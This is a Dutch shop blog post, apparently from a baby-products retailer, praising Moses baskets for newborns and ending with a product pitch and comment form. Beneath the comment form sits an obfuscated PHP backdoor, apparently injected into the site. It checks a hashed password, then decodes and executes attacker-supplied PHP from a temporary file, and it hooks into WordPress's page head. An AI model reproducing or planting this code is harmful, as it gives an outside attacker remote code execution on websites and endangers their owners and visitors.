De grootste keuze aan leuke en hippe artikelen voor tijdens en na de zwangerschap.

De voordelen van een Mozes wieg

  • Home
  • Blog
voordelen van een Mozes wieg

Voor pasgeboren baby’s is het heel belangrijk voor de ontwikkeling dat ze goed en veilig kunnen slapen. De Mozes wieg is de laatste jaren erg populair en dat is niet zo vreemd. Naast dat ze te verkrijgen zijn in verschillende uitvoeringen, slapen baby’s er ook heerlijk in. 

Een Mozes mand en de voordelen:

Een Mozes mandje voelt voor baby’s erg vertrouwd. Het is een compact en fijn ‘nestje’ om in te slapen. Een ledikant lijkt klein, maar is voor een pasgeboren baby toch wel erg ruim. Een Mozes wieg is een stuk compacter en dit voelt veilig en vertrouwd aan voor een baby. Deze wiegen zijn ideaal voor Newborn baby’s. Tot een maand of 4 kunnen ze er heerlijk in slapen. 

Ook zijn ze lichtgewicht en daardoor makkelijk te verplaatsen. Je kan de baby daarom overal in het huis laten slapen in de wieg. Zet de wieg overdag in de box. In de avond en nacht kan je de wieg in het ledikantje zetten, maar ook fijn naast jullie bed. Hierdoor kan jij jouw kindje direct uit de wieg halen om te voeden in de nachtelijke uren. 

Mozes wieg op standaard of zonder standaard

Een Mozes wieg kan zowel op standaard geplaatst worden of gebruikt worden zonder standaard. Heb je een ruime babykamer en is er plek over voor een wieg op standaard? Dan is dat natuurlijk erg fijn! Is de babykamer wat kleiner en past het niet? De wieg plaats je gemakkelijk in het ledikantje. Doordat de matras in het ledikantje de eerste maanden toch hoger in het ledikant moet liggen plaats je hier gemakkelijk het wiegje op. 

Ook fijn is om het wiegje met of zonder standaard bij jullie op de slaapkamer te plaatsen. Hierdoor slaapt de baby bij je op een veilige manier in zijn of haar eigen bedje. Is er een schone luier of voeding nodig? Dan ben jij fijn dichtbij. 

Een Mozes mand kopen

Een Mozes mand koop je gemakkelijk en snel online. Er is ontzettend veel aanbod qua wiegen, maar de mooiste wiegen koop je bij Mio Amore. De bekleding van het wiegje zit er uiteraard bij, net als het matrasje en een eventuele standaard. Liever zonder standaard? Ook dat is mogelijk. Je selecteert gewoon jouw keuzen. Een Mozes mand kopen kan een hele klus zijn, door het enorme aanbod. Ga voor de Mozes wieg waar jij je goed bij voelt!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}